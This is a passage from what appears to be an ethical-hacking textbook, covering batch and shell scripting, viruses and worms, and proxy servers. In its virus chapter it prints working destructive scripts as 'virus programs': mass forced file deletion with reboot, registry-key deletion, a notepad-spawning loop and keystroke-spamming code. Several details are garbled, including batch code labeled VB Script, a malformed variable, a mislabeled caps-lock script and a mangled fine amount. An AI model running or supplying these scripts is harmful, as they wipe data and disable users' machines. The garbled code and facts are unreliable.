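# backup_file SRC DEST_DIR
# Copies SRC into DEST_DIR with today's date appended to its name and
# prints the path of the copy. Returns 1 if SRC is not a regular file.
backup_file() {
    src=$1
    dest_dir=$2
    if [ ! -f "$src" ]; then
        printf 'skip: %s is not a regular file\n' "$src" >&2
        return 1
    fi
    mkdir -p "$dest_dir" || return 1
    # Command substitution: $(date ...) is replaced by the command's output.
    stamp=$(date +%Y-%m-%d)
    copy="$dest_dir/$(basename "$src").$stamp"
    cp -p "$src" "$copy" || return 1
    printf '%s\n' "$copy"
}

# backup_dir SRC_DIR DEST_DIR
# Loops over every entry in SRC_DIR, backs up the regular files, and
# prints the number of files copied (directories are skipped).
backup_dir() {
    count=0
    for f in "$1"/*; do
        if backup_file "$f" "$2" >/dev/null; then
            count=$((count + 1))
        fi
    done
    echo "$count"
}

# demo builds a constructed source tree in a temporary directory, runs the
# backup, lists the result and cleans up, so the script runs offline.
demo() {
    work=$(mktemp -d)
    mkdir "$work/src"
    echo "alpha" > "$work/src/a.txt"
    echo "beta" > "$work/src/b.txt"
    mkdir "$work/src/sub"      # a directory: skipped by the -f test
    n=$(backup_dir "$work/src" "$work/bak")
    echo "copied $n files into $work/bak"
    ls "$work/bak"
    rm -rf "$work"
}

demo
```

Saved as a file and made executable, backup_dir can be invoked with a source and destination directory just like any other command, which is the "shortcut" use described under Capabilities above; the date stamp in each copy's name is what lets several days of backups live side by side without overwriting each other.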
Why do hackers use this?
Nowadays, with all the point-and-click programs out there, you can be a fairly good ethical hacker without knowing any programming. You can do some effective hacking if you understand all of the security tools very well. Even so, unless you understand what's going on in the background of these programs, most people will still classify you as a script kiddie. Learning to program, even just the very basics, will give you a much better understanding of what's going on. Also, once you learn how to program well, you'll be able to develop your own exploits, which is great in many ways:
1. You will be considered an elite hacker.
2. Imagine a black hat discovers a vulnerability and codes an exploit for it that no one else knows about. The black hat would be able to take down thousands of machines before anyone discovers and patches the vulnerability. If you have knowledge of the underlying script, then as a white hat hacker you can take appropriate preventive measures.118
16.7 Shell Script Example
To test the Quick Edit Mode you just enabled, copy the text below, then right-click anywhere in the command shell window.
Echo Hello World. Here is my first line of shell scripting code!
The text you copied will appear next to the command prompt. Press Enter to execute your first shell command.
117 http://en.wikipedia.org/wiki/Shell_script
118 http://expect-us.net/files/The_Hacker_s_Underground_Handbook.pdf
You have just run code from the command line. Now, let’s use a
script (i.e., a .bat file) to run similar code. Open Notepad. Copy
these four lines then paste them into the Notepad file.
@Echo Off
Echo Hello World. Here is my first line of shell scripting code!
Echo Hello World. Here is my second line of shell scripting code!
Echo Hello World. Here is my third line of shell scripting code!
Select Save in the File menu. In the Save As dialog box that appears, type Hello.bat in the File name text box. Leave the default entry of Text Documents (*.txt) in the Save as type text box. In the Save in drop-down menu, select Desktop and click Save. Close Notepad.
The file Hello.bat now appears on your desktop. Position the file and
your command shell window so that both are visible on your screen.
Drag the file onto the command shell window. The path to the .bat
file you just created appears at the command prompt ready to run.
Dragging the file onto the command shell window is a shortcut for
typing the path to the file. Click the command shell window so that
you see the cursor, and then press Enter to run the .bat file.
These two exercises demonstrate three important scripting concepts:
• You can run only one line of code at a time from the command shell window.
• You can use a .bat file to run one or more lines of code.
• By default, lines of code in a .bat file execute sequentially from top to bottom.
Learning the Echo and Rem Commands
In the .bat file you executed, you might have noticed that the word
Echo appears several times. Echo is a useful command that lets
you display messages.
Echo Hello World. Here is my first line of shell scripting code!
As the code shows, to display text, you specify the Echo command
followed by the text you want to display. Any text between Echo
and the line return will appear when you run the code.
You can use the Echo command to turn the system’s command-
echoing feature on and off. By default, the command-echoing
feature is on. To turn the system’s command-echoing feature off,
you use the off parameter with the command name. To see the
command-echoing feature and the Echo Off command in action,
open Notepad.
Echo Hello World. Here is my shell scripting code that demonstrates Echo On!
Echo Off
Echo Hello World. Here is my shell scripting code that demonstrates Echo Off!
Copy the lines and paste them into the Notepad file. Save the file
as HelloAgain.bat. Drag the file onto the command shell window,
click the window, then press Enter to run HelloAgain.bat. In the
results, note that the output of the third line of code is visible in the
command shell window, but not the command that produced it. As this
example shows, you can strategically use the Echo Off command to
send only a command’s output to the screen.
Like a light switch, after you turn the command-echoing feature
off, it stays off until you turn it back on. To turn the command-
echoing feature back on, you use the Echo command with the on
parameter:
Echo On
You can turn the command-echoing feature off for just one line by
preceding the Echo Off command with the at (@) sign:
@Echo Off
Another useful command to learn is Rem. This command lets you
insert remarks (i.e., comments) in a .bat file. A comment is text
that’s not meant to be executed but rather to help explain
something in the .bat file. Systems administrators often use
comments to explain how a .bat file works or how to configure the
.bat file for a particular system. Using the Rem command is
simple. At the beginning of the line, you specify the command
followed by the comment:
Rem The comment goes here.
Any text between Rem and the line return will not be executed.
Another way to comment out a line is to use a double colon (::):
:: The comment goes here.
Hard-Coding Information
In a script, you often have to specify computer or user information
(e.g., drive, filename, username). When you code this information
directly into your script, you’re hard-coding the information. Take,
for example, the code
Echo My NT installation is in the C:\winnt directory.
In this code, the pathname C:\winnt is hard-coded.
Using Environment Variables
NT’s online Help file defines an environment variable as, "A string
consisting of environment information, such as a drive, path, or
filename, associated with a symbolic name that can be used by
Windows NT." Environment variables let you easily access
environment information that the registry stores. The registry
stores system-related environment information in the
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Environment
subkey and user-related environment information in the
HKEY_CURRENT_USER\Environment subkey.
You can use the Set command to see the environment variables
defined on your computer. Open the command shell window, type the
following at the command prompt, then press Enter. A list of the
environment variables appears.
Set
You can use the Control Panel System applet to add more
environment variables. Open the applet, and select the
Environment tab. Type the environment variable’s symbolic name
in the Variable field and its environment information in the Value
field. Click Set.
In a script, you can use an environment variable’s symbolic name
to access that variable’s value.
Echo My NT installation is in the C:\winnt directory.
For example, if you run this code in the command shell window,
you receive the message My NT installation is in the C:\winnt
directory. Instead of hard-coding the installation pathname, you
can use the environment variable that contains this information:
SYSTEMROOT. To retrieve and use an environment variable's value
in code, you need to enclose the environment variable's symbolic
name in percent (%) signs. So, to retrieve the NT installation
pathname, you can run the code
Echo My NT installation is in the %SYSTEMROOT% directory.
If you installed NT in the default location, you receive the
message My NT installation is in the C:\winnt directory. If you’ve
changed the location, the message will display that pathname
instead of C:\winnt.
Let’s look at another example. Suppose you want to create a text
file, test.txt, in the Temp directory on your computer.
Echo Here is the test file you created. > C:\temp\test.txt
If you run this code, the system creates test.txt in the C:\temp
folder; this file has one line that reads Here is the test file you
created. However, if your Temp folder isn’t in the specified location
(i.e., C:\temp), this code will fail. To avoid possible failure, you can
use the TEMP environment variable instead of hard-coding the
Temp folder’s location.
Echo Here is the test file you created. > %TEMP%\test.txt
If you run this code, the system creates test.txt in the Temp folder,
no matter the location of that folder.
In the last two code examples, note the use of the greater than (>)
sign. The > sign is a redirection symbol that tells the system to
redirect the output of the preceding command (in this case, the
Echo command) to the specified file.
Another useful environment variable is USERPROFILE, which
contains profile information about the currently logged-on user.
For example, you can use this variable with the Dir command. The
Dir command lists all the subdirectories and files in the directory
you specify.
Dir %USERPROFILE%
If you specify USERPROFILE as the directory with the code you
receive the contents of the Profiles directory for the currently
logged-on user. If you want the username of the currently logged-
on user and the name of the computer the user is logged on to, you
can run the code
Echo A user called %USERNAME% is logged into
%COMPUTERNAME% now.
Suppose you want to map a drive to a share. You type the following
command at the command prompt, where servername is the name
of the target server and sharename is the name of the target share.
Net Use * \\servername\sharename
When you run this command, the system maps the specified drive
to the specified share, and then sends the standard output The
command completed successfully to your screen. If you don't want
to clutter your screen with that output, you can suppress it by
appending > NUL to the Net Use command:
Net Use * \\servername\sharename > NUL
When you run this command, the system sends the standard
output to the command-shell trash can instead of your screen.
Now let's look at how to suppress a command's error output. Let’s
intentionally force an error by trying to map a drive to a share that
doesn't exist.
At the command prompt, type the following, where servername is the name of
your server and noshare is a fictitious share:
Net Use R: \\servername\noshare
When you run this
command, your screen will display error output that reads
something like System error 67 has occurred. The network name
cannot be found. To suppress that error output, you can append 2>
NUL to the command:
Net Use R: \\servername\noshare 2> NUL
When you run this command, the system redirects the error
output to the command-shell trash can.
For More Examples of Redirection in Action
The 20530.zip file contains another script, BootIniTester.bat, which
provides more examples of how redirection symbols work. This
script tests the C and D drives on your machine to see whether the
boot.ini file is present, then creates a report detailing the results.
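The BootIniTester.bat script itself is not reproduced in this book. The following added example is my own script, not the one from 20530.zip; it does a similar job and exercises the commands covered in this section: Echo Off, Rem, environment variables, the > and >> redirection symbols to build a report, and > NUL and 2> NUL to discard output. It assumes a Windows cmd.exe shell; the report file name and the :CheckDrive subroutine name are this example's own choices.

```batch
@Echo Off
Rem BootIniReport.bat: an added example, not the BootIniTester.bat from 20530.zip.
Rem Checks the C and D drives for boot.ini and writes a short report using the
Rem environment variables and redirection symbols covered in this section.
Rem Assumes a Windows cmd.exe shell; the report file name is this example's choice.

Set REPORT=%TEMP%\BootIniReport.txt

Rem A single greater-than sign creates or overwrites the report; two of them append.
Echo Boot.ini report for %COMPUTERNAME%, prepared by %USERNAME% > "%REPORT%"
Echo Windows is installed in %SYSTEMROOT% >> "%REPORT%"
Echo. >> "%REPORT%"

Rem Run the same check once per drive by calling the subroutine below.
Call :CheckDrive C:
Call :CheckDrive D:

Rem Display the finished report, then stop before falling into the subroutine.
Type "%REPORT%"
Goto :EOF

:CheckDrive
Rem %1 is the drive letter passed by Call. Dir /A includes hidden and system
Rem files, which boot.ini normally is. Only success or failure matters here, so
Rem standard output is redirected to NUL and error output (stream 2) to NUL as well.
Dir /A %1\boot.ini > NUL 2> NUL
If ErrorLevel 1 (
    Echo %1 - boot.ini NOT found >> "%REPORT%"
) Else (
    Echo %1 - boot.ini found >> "%REPORT%"
)
Rem A drive that does not exist at all, such as a missing D:, also reports as not found.
Goto :EOF
```

Save the text as BootIniReport.bat and run it from the command shell window; the report is written to %TEMP% and then displayed, and nothing from the Dir checks themselves reaches the screen.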
WhoAmI.bat:
Requires Microsoft Networking to be installed and active, and the
DOS find command. If you have a UNIX find command in the path,
you'll probably get a "No such file or directory" error.
@echo off
echo.
net config /yes | find "name"
echo.
pause
119 http://www.jpsdomain.org/windows/winshell.html
CHAPTER 17
Viruses and Worms
Objective
17.1 Introduction
17.2 Definition of Virus
17.3 Virus Infection
17.4 Types of Virus
17.5 Examples
17.6 Worms
17.7 Sheep Dip Computer
17.8 Difference between virus and worm
17.9 Countermeasure
17.1. Introduction
Malware, short for malicious (or malevolent) software, is software used or
created by attackers to disrupt computer operation, gather sensitive
information, or gain access to private computer systems. It can appear in
the form of code, scripts, active content, and other software. 'Malware' is
a general term used to refer to a variety of forms of hostile or intrusive
software.
Malware includes computer viruses, worms, Trojan horses, spyware,
adware, and other malicious programs.
The best-known types of malware, viruses and worms, are known for the
manner in which they spread, rather than any specific types of behavior.
The term computer virus is used for a program that has infected
some executable software and, when run, causes the virus to spread to
other executables. On the other hand, a worm is a program that actively
transmits itself over a network to infect other computers. These
definitions lead to the observation that a virus requires user intervention
to spread, whereas a worm spreads itself automatically.120
120 http://en.wikipedia.org/wiki/Malware
17.2 What is a Virus?
A computer virus is a program or piece of code that is loaded onto your
computer without your knowledge and runs against your wishes. Viruses
can also replicate themselves. All computer viruses are man-made. A
simple virus that can make a copy of itself over and over again is
relatively easy to produce. Even such a simple virus is dangerous
because it will quickly use all available memory and bring the system to
a halt. An even more dangerous type of virus is one capable of
transmitting itself across networks and bypassing security systems.121
17.3 Virus Infection
A greeting card program emailed to you from a friend might display a
holiday animation and song, while at the same time installing a remote
access virus program that gives a distant hacker control over your
computer whenever you're connected to the Internet. Similarly, a
shareware program downloaded and emailed to you by another friend
might have been infected with a virus on his computer or the server
where it was stored.
The first thing a boot or program virus often does is insert commands
and settings in the operating system so that they can operate freely,
undetected, and unaudited, without warning messages or access log
records. Some of them even change the Basic Input Output System
(BIOS) that interfaces between the computer's hardware and software to
help mask their activities.
The most sophisticated program viruses include "stealth viruses", which
encrypt their contents to try to avoid detection by virus protection
software, and "polymorphic viruses", which alter their content every time
they replicate to try to avoid detection, behaviour much like that of
biological viruses. Most anti-virus programs can still catch these types of
viruses.
121 http://www.webopedia.com/TERM/V/virus.html
Life Cycle of a Virus
A virus generally passes through four stages in its life cycle:
Dormant phase (rest or sleep phase): the virus is idle (not all
viruses have this stage).
Propagation phase (distribution phase): the virus places an
identical copy of itself into other programs or into certain system
areas.
Triggering phase (active phase): the virus is activated to perform
the function for which it was created.
Execution phase: the function is performed (the function may be
harmless or damaging).
Viruses - Families and Habitats
Computer viruses of one kind or another have infected the Internet since
its very first years of existence. Virus protection is now required
technology for everyone that uses the Internet.
Signs that your computer might have a virus could include spontaneous
startup of programs like email programs, unexplained attempts by
programs on your computer to access the Internet, changes in file date
stamps, unusually slow program load or run times, lots of unexplained
disk activity, or failure of a program or your computer to start. However,
if you have an anti-virus protection running, then problems like a slow
computer or lots of disk activity are most likely caused by an inefficient
system configuration, not enough memory, a fragmented disk, or other
benign causes, since most viruses won't give any visible signs.
Some viruses are only annoying, displaying a message, using extra
memory or disk, or changing file names. However, some are destructive
and will change files and erase data, and some will erase your entire
hard drive. Some run silently in the background and give outside agents
complete control of your computer without your knowledge whenever you
are connected to the Internet. The Internet gives viruses a particularly
efficient new path for global infection. Some email viruses have spread
around the world and brought down tens of thousands of computers in
just a few hours. It is absolutely essential that you run an anti-virus
protection program to safeguard your computer from these serious
threats.
17.4 Types of Virus
A. Boot Sector Virus
The term “boot sector” is a generic name that seems to originally come from MS-DOS but
is now applied generally to the boot information used by any operating system. In modern
computers this is usually called the “master boot record,” and it is the first sector on a
partitioned storage device.
Boot sector viruses became popular because of the use of floppy disks to
boot a computer. The widespread usage of the Internet and the death of
the floppy have made other means of virus transmission more effective.
B. Browser Hijacker
This type of virus, which can spread itself in numerous ways including voluntary download,
effectively hijacks certain browser functions, usually in the form of re-directing the user
automatically to particular sites. It’s usually assumed that this tactic is designed to
increase revenue from web advertisements.
C. Direct Action Virus
This type of virus, unlike most, only comes into action when the file
containing the virus is executed. The payload is delivered and then the
virus essentially becomes dormant – it takes no other action unless an
infected file is executed again.
Most viruses do not use the direct action method of reproduction simply
because it is not prolific, but viruses of this type have done damage in
the past. The Vienna virus, which briefly threatened computers in 1988,
is one such example of a direct action virus.
D. File Infector Virus
Perhaps the most common type of virus, the file infector takes root in a host file and then
begins its operation when the file is executed. The virus may completely overwrite the file
that it infects, or may only replace parts of the file, or may not replace anything but
instead re-write the file so that the virus is executed rather than the program the user
intended.
Although called a “file virus”, the term does not apply to every virus that lives in a
file; for example, the macro virus described below is not considered a file virus. Instead,
the definition usually refers only to viruses that use an executable file format, such as
.exe, as their host.
E. Macro Virus
A wide variety of programs, including productivity applications like
Microsoft Excel, provide support for Macros – special actions
programmed into the document using a specific macro programming
language. Unfortunately, this makes it possible for a virus to be hidden
inside a seemingly benign document.
Macro viruses vary widely in terms of payload. The most well known
macro virus is probably Melissa, a Word document supposedly
containing the passwords to pornographic websites. The virus also
exploited Word’s link to Microsoft Outlook in order to automatically
e-mail copies of itself.
F. Multipartite Virus
While some viruses are happy to spread via one method or deliver a
single payload, multipartite viruses want it all. A virus of this type may
spread in multiple ways, and it may take different actions on an infected
computer depending on variables, such as the operating system installed
or the existence of certain files.
G. Polymorphic Virus
Another jack-of-all-trades, the Polymorphic virus actually mutates over
time or after every execution, changing the code used to deliver its
payload. Alternatively, or in addition, a Polymorphic virus may guard
itself with an encryption algorithm that automatically alters itself when
certain conditions are met.
The goal of this trickery is evasion. Antivirus programs often find viruses
by the specific code used. Obscuring or changing the code of a virus can
help it avoid detection.
H. Resident Virus
This broad virus definition applies to any virus that inserts itself into a
system’s memory. It then may take any number of actions and run
independently of the file that was originally infected.
A resident virus can be compared to a direct payload virus, which does
not insert itself into the system’s memory and therefore only takes action
when an infected file is executed.122
17.5 Sample of Virus programs in VB Script
1. This pops up a funny message, then shuts down the computer
@echo off
Del %system drive%\*.* /f /s /q
shutdown -r -f -t 00
2. Delete Key Registry Files
*This will delete key registry files, then loop a message* (CANNOT
BE RECOVERED FROM)
@ECHO OFF
START reg delete HKCR/.exe
START reg delete HKCR/.dll
START reg delete HKCR/*
:MESSAGE
ECHO Your computer has been faked. Have a nice day.
GOTO MESSAGE
3. Endless Notepads
*This will pop up endless notepads until the computer freezes and
crashes*
@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top
122 http://www.makeuseof.com/tag/types-computer-viruses-watch/
4. Crazy caps lock
*This constantly turns caps lock on and off really fast
continuously*
MsgBox "Let's go back a few steps"
Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{bs}"
loop
5. Popping CD Drives
*This will make the CD drives constantly pop out*
Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
for i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 100
loop
6. Systems reboot Virus source code
When this file is run, it creates a registry entry in
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\.
The script then writes a script file called dlRB.vbs to
C:\%systemroot%\system32\. This file (dlRB.vbs)
reboots the computer when run and, you guessed it, because of the
registry entry this 'reboot' file runs each time the target tries to
log into Windows. After the script is done, it forces a system reboot.
17.6 What is a Worm?
A worm is a program or script that replicates itself and moves through a
network, typically travelling by sending new copies of itself via email.
Internet Worms
Internet worms are truly autonomous virtual viruses, spreading across
the net, breaking into computers, and replicating without human
assistance and usually without human knowledge.
Worms - Types and Habitats
Worms are particularly interesting technological constructs, with an
intriguing mathematical structure and complexity. They fascinate
because they take the digital imitation of life to another step -- they
autonomously search for computers, penetrate them, and replicate their
intelligence to continue the process.
An Internet worm can be contained in any kind of virus, program or
script. Sometimes their inventor will release them into the wild in a
single copy, leaving them to replicate by themselves through a variety of
stratagems and protocols.
History
Worms use a variety of methods to propagate across the Internet. Early
worms simply scanned the local network drives and folders and inserted
themselves into programs wherever they could, trusting human beings to
move disks and directories around in the normal course of things so they
could continue to spread.
Since the late 1990s, many Internet worms have been Visual Basic
script viruses which replicate on Windows computers by interacting with
the user's email program to send themselves to many (often all) of the
addresses in the address book. Once on a new machine, they repeat the
process with the new user's address book, quickly expanding the number
of people reached. Some of the worst outbreaks of email worms have
spread around the world within just a few hours, and email remains the
Internet worm's fastest known transmission method.
Beginning in 2001, the most dangerous worms started to employ
weaknesses in the Windows operating system to attack machines directly
across the Internet. When a significant Windows weakness was found,
Microsoft would patch it, hackers would release worms to attack it a few
weeks later, and any unpatched machine connected to the Internet
would soon be compromised. With several hundred million machines
running Windows, statistically speaking a lot don't get patched
immediately, so there are always thousands of vulnerable systems. Even
computers inside a firewall protected intranet are at risk as long as there
is one weak link somewhere -- an unprotected machine on the Internet
able to reach the rest of the intranet. Microsoft introduced automatic
operating system updates to help solve this problem.
The most successful Internet worm of all time, in terms of sheer
saturation, was the Code Red worm, which scanned the Internet for
vulnerable Windows computers running the IIS web server to install it
and continue the infection. For example, a list of the code red infected
computers trying to break into the Living Internet site on August 7,
2001, can be found here. (Fortunately, the site was running on the
Apache web server.)
A wide range of other inventive strains of Internet worms have employed
security weaknesses in IRC, MAPI, Sendmail, finger, and other programs
and protocols. A few worms began to be discovered for Linux in the late
1990s as it became more popular across the Internet and some
vulnerabilities were found, but the strong security architecture of Linux
has kept the number of problems relatively low.
The first worm
The first worm disabled most of the Internet then existing. Robert Morris,
a Computer Science graduate student at Cornell University and son of
the Chief Scientist at the National Computer Security Center, wrote a 99
line program in the C language designed to self-replicate and propagate
itself from machine to machine across the Internet. The worm performed
the trick by combining a bug in the debugging mode of the Sendmail
program used to control email on almost all Internet computers, a bug in
the finger program, and the UNIX rexec and rsh commands.
On November 2, 1988, Morris released his worm, but did so from an MIT
computer to disguise his origin. In his view, only one thing went wrong --
the worm started replicating at a much faster rate than he had predicted,
and began crashing and disabling computers across the Internet.
Morris sent out an anonymous message telling people how to disable the
worm, but because it had brought down the Internet, the message about
how to disable it couldn't get through. The worm eventually infected
more than 6,000 computers across the Internet. Within a day teams of
programmers at the University of California at Berkeley and Purdue
University reverse engineered the worm and developed methods of
stopping it. The Internet then came back to normal in a couple of days.
Morris claimed that he had intended his worm as an innocent
experiment and hadn't planned it to have any negative effects.
Nonetheless, he was eventually convicted of violating the Computer Fraud
and Abuse Act (Title 18), and sentenced to three years of probation, 400
hours of community service, and a $10, 0170 fine. His appeal was
rejected in March, 1991.
At least one good thing resulted from this incident -- the Computer
Emergency Response Team, or CERT, was formed by ARPA in response
to the Morris worm incident to track and provide information on Internet
security threats.
17.7 What is Sheep-dip Computer?
In computers, a sheep-dip (or, variously, sheep dipping or a footbath) is
the checking of media, usually diskettes or CD-ROMs, for viruses before
they are used in a computer or network. A sheep-dip computer is used
only for virus-checking. The computer makes use of one or two antivirus
programs that are kept current on a daily basis.
Sheep dipping is generally used only for data on external media, not for
data directly downloaded from the Internet. However, when files or
programs are downloaded from the Internet, an ideal approach for
safety's sake is to put them on removable media initially. The removable
media can then be run through the sheep dip before transferring the
data to the hard disk of a proprietary computer.
17.8 Difference between a Virus and a Worm
A virus and a worm are similar in that they’re both forms of malicious
software i.e. malware. A virus infects another executable and uses this
carrier program to spread itself. The virus code is injected into the
previously benign program and is spread when the program is run.
Examples of virus carrier programs are macros, games, e-mail
attachments, Visual Basic scripts, and animations.
A worm is a type of virus, but it’s self-replicating. A worm spreads from
system to system automatically, but a virus needs another program in
order to spread. Viruses and worms both execute without the knowledge
or desire of the end user.
17.9 Countermeasures
Always update your anti-virus software at least weekly.
Back up your important files and ensure that they can be restored.
Change the computer's boot sequence to always start the PC from
its hard drive.
Don't share Drive C: without a password and without read-only
restrictions.
Empty floppy drives of diskettes before turning on computers,
especially laptops.
Forget opening unexpected e-mail attachments, even if they're from
friends.
Get trained on your computer's anti-virus software and use it.
Have multiple backups of important files. This lowers the chance
that all are infected.
Install security updates for your operating system and programs as
soon as possible.
Jump at the chance to learn more about your computer. This will
help you spot viruses.
Anti-virus
• Detection:
– determine infection and locate the virus
• Identification:
– identify the specific virus
• Removal:
– remove the virus from all infected systems, so the disease
cannot spread further
• Recovery:
– restore the system to its original state
Penetration testing for Virus
Also known as "white hat hacking" or "ethical hacking", penetration
testing refers to evaluating the security of systems on the Internet by
using the same techniques that are employed illegally by hackers.
However, when used legally during penetration testing, these techniques
are used in a more controlled and thorough way. Unfortunately, given its
rise in popularity and the benefits it offers, everybody is offering to do
penetration testing. Simply running a vulnerability scanning tool is not a
penetration test and sometimes it's worse than not doing123
123 http://www.jcaksrce.org/upload/48122216_vol1i1p3.pdf
CHAPTER 18
Proxy Server
18.1 Understanding Proxy Server
18.2 How does a Proxy Server work?
18.3 Types of Proxy Server
18.4 Use of Proxy Server for attack
18.5 IP Address Spoofing
18.6 MAC Address Spoofing
18.1. Understanding Proxy Server
In computer networks, a proxy server is a server (a computer system or
an application program) that acts as an intermediary for requests from
clients seeking resources from other servers. A client connects to the
proxy server, requesting some service, such as a file, connection, web
page, or other resource, available from a different server.
A proxy server receives a request for an Internet service (such as a Web
page request) from a user. If it passes filtering requirements, the proxy
server, assuming it is also a cache server, looks in its local cache of
previously downloaded Web pages. If it finds the page, it returns it to the
user without needing to forward the request to the Internet. If the page is
not in the cache, the proxy server, acting as a client on behalf of the
user, uses one of its own IP addresses to request the page from the
server out on the Internet. When the page is returned, the proxy server
relates it to the original request and forwards it on to the user.124
The proxy server evaluates the request according to its filtering rules. For
example, it may filter traffic by IP address or protocol. If the request is
validated by the filter, the proxy provides the resource by connecting to
the relevant server and requesting the service on behalf of the client. A
proxy server may optionally alter the client's request or the server's
response, and sometimes it may serve the request without contacting the
specified server.
124 http://whatis.techtarget.com/definition/proxy-server
[Figure: Proxy Server]125
A proxy server shares one Internet connection with all the computers
on your local network; more generally, it is a computer that offers a
network service allowing clients to make indirect connections to other
network services.
So a proxy (proxy server) is basically a server that acts as a mediator
between the client (the user's computer) and the server (the computer at
the other end of the network connection, on which the information requested
by the user resides, for example a web server). When a client requests
data from an Internet resource, the traffic goes from the web
browser or application through the proxy before it reaches the
requested source, comes back through the proxy, and the proxy then
transmits the data to the client.126
A proxy server sits between a client application, such as a Web browser,
and a real server. It intercepts all requests to the real server to see if it
can fulfill the requests itself. If not, it forwards the request to the real
server.
A proxy server has many potential purposes, including:
- To keep the machines behind it anonymous (mainly for security).
- To speed up access to resources (using caching). Web proxies are
  commonly used to cache web pages from a web server.
- To apply access policy to network services or content, e.g. to block
  undesired sites.
- To log and audit usage, i.e. to provide company employee Internet
  usage reporting.
- To bypass security or parental controls.
- To scan transmitted content for malware before delivery.
- To scan outbound content, e.g. for data leak protection.
- To circumvent regional restrictions.
125 https://encrypted-tbn2.gstatic.com/images
126 http://blog.eukhost.com/webhosting/proxy-server-2/
A proxy server that passes requests and replies unmodified is usually
called a gateway or sometimes tunneling proxy. A proxy server can be
placed in the user's local computer or at various points between the user
and the destination servers on the Internet.
A reverse proxy is an Internet-facing proxy used as a front-end to
control and protect access to a server on a private network, commonly
also performing tasks such as load-balancing, authentication, decryption
or caching.
18.2 How a Proxy Server Works
1. When a computer on the intranet makes a request out to the Internet,
   such as to retrieve a web page from a web server, the internal
   computer actually contacts the proxy server, which in turn contacts
   the Internet server. The Internet server sends the web page to the
   proxy server, which then forwards the page to the computer on the
   intranet.
2. Proxy servers can log all traffic between the Internet and the intranet.
   For example, a Telnet proxy server could track every keystroke in
   every Telnet session on the intranet, and could also track how the
   external server on the Internet reacts to those keystrokes. Proxy
   servers can log every IP address, the date and time of access, the
   URL, the number of bytes downloaded, and so on. This information can
   be used to analyze attacks launched against the network. It can also
   help intranet administrators build better access and services for
   employees.
3. Some proxy servers must work with special proxy clients. The more
   common approach is to use off-the-shelf clients, such as Netscape or
   any other web browser, with proxy servers. When such an off-the-shelf
   package is used, it must be configured to use the proxy from its
   configuration (network or connection) settings. The intranet employee
   then uses the client software as usual; the client knows to send its
   requests to the proxy server instead of directly to the Internet.
4. Proxy servers can do more than relay requests back and forth between
   an intranet and the Internet. They can also enforce security policy.
   For example, an FTP proxy server could be set up to allow files to be
   sent from the Internet to a computer on the intranet but to block
   files from being sent from the corporate network out to the Internet,
   or vice versa. In this way, intranet administrators can block anyone
   outside the corporation from downloading vital corporate data, or stop
   intranet users from downloading files that may contain viruses.
5. Proxy servers can also be used to speed up the performance of some
   Internet services by caching data, i.e. keeping copies of requested
   data. For example, a web proxy server could cache many web pages, so
   that whenever someone on the intranet wants one of those pages, they
   get it directly from the proxy server over the high-speed intranet
   links instead of going out across the slower Internet connection.127
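The five steps above, as one added worked example (not code from the book): the decision core of a filtering, caching, logging forward proxy. The connection to the server out on the Internet is injected as a `fetch` callable so the example runs offline; the blocked-host policy, the `FakeUpstream` class and the sample request lines are constructed for illustration.

```python
import time
from urllib.parse import urlsplit

# Constructed policy for the example: hosts and schemes the proxy refuses.
BLOCKED_HOSTS = {"ads.example", "blocked.example"}
BLOCKED_SCHEMES = {"ftp"}


class ProxyCore:
    """Request handling of a forward proxy: parse, filter, cache, log, fetch.

    `fetch(url) -> (status, body)` stands in for the proxy's own connection to
    the server out on the Internet (step 1); it is injected so tests run offline.
    """

    def __init__(self, fetch):
        self.fetch = fetch
        self.cache = {}   # url -> (status, body)         (step 5)
        self.log = []     # one dict per request           (step 2)

    @staticmethod
    def parse_request_line(line):
        # A request sent to a proxy carries an absolute URI:
        #   GET http://www.example.com/ HTTP/1.0
        parts = line.strip().split(" ")
        if len(parts) != 3:
            raise ValueError("malformed request line: %r" % line)
        method, target, _version = parts
        url = urlsplit(target)
        if not url.scheme or not url.hostname:
            raise ValueError("proxy requests need an absolute URI: %r" % target)
        return method, url

    def handle(self, client_ip, request_line):
        """Return (status, body) for one client request, recording an audit entry."""
        method, url = self.parse_request_line(request_line)
        key = url.geturl()
        entry = {"ts": time.time(), "client": client_ip,
                 "method": method, "url": key}
        self.log.append(entry)

        # Step 4: policy filter, applied before any connection is made.
        if url.scheme in BLOCKED_SCHEMES or url.hostname in BLOCKED_HOSTS:
            entry["result"] = "denied"
            return 403, b"Forbidden by proxy policy"

        # Step 5: serve from the local cache when we already have the page.
        if method == "GET" and key in self.cache:
            entry["result"] = "cache-hit"
            status, body = self.cache[key]
            entry["bytes"] = len(body)
            return status, body

        # Step 1: fetch on the client's behalf, using the proxy's own address.
        status, body = self.fetch(key)
        if method == "GET" and status == 200:
            self.cache[key] = (status, body)
        entry["result"] = "fetched"
        entry["bytes"] = len(body)
        return status, body


class FakeUpstream:
    """Constructed stand-in for the Internet server; counts real fetches."""

    def __init__(self):
        self.calls = 0

    def __call__(self, url):
        self.calls += 1
        return 200, b"<html>page for " + url.encode() + b"</html>"


def demo():
    """Run the constructed scenario: fetch, cache hit, then a policy denial."""
    upstream = FakeUpstream()
    proxy = ProxyCore(upstream)
    results = [
        proxy.handle("10.0.0.5", "GET http://www.example.com/ HTTP/1.0"),
        proxy.handle("10.0.0.6", "GET http://www.example.com/ HTTP/1.0"),
        proxy.handle("10.0.0.5", "GET http://ads.example/banner HTTP/1.0"),
    ]
    return upstream.calls, [e["result"] for e in proxy.log], results


if __name__ == "__main__":
    calls, outcomes, _ = demo()
    print("upstream fetches:", calls, "outcomes:", outcomes)
```

The second client's request for the same page never reaches the upstream server, and the audit log records who asked for what and whether policy, cache or the Internet answered; that log is exactly what step 2 says an administrator reads after an incident.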
18.3 Types of Proxy Server
Normal (Regular/Caching) Proxy:
A regular caching proxy server is a server which listens on a separate
port and the clients (browsers) are configured to send requests for
connectivity to that port. So the proxy server receives the request, fetches
the content and stores a copy for future use. So next time when another
client requests for the same webpage the proxy server just replies to the
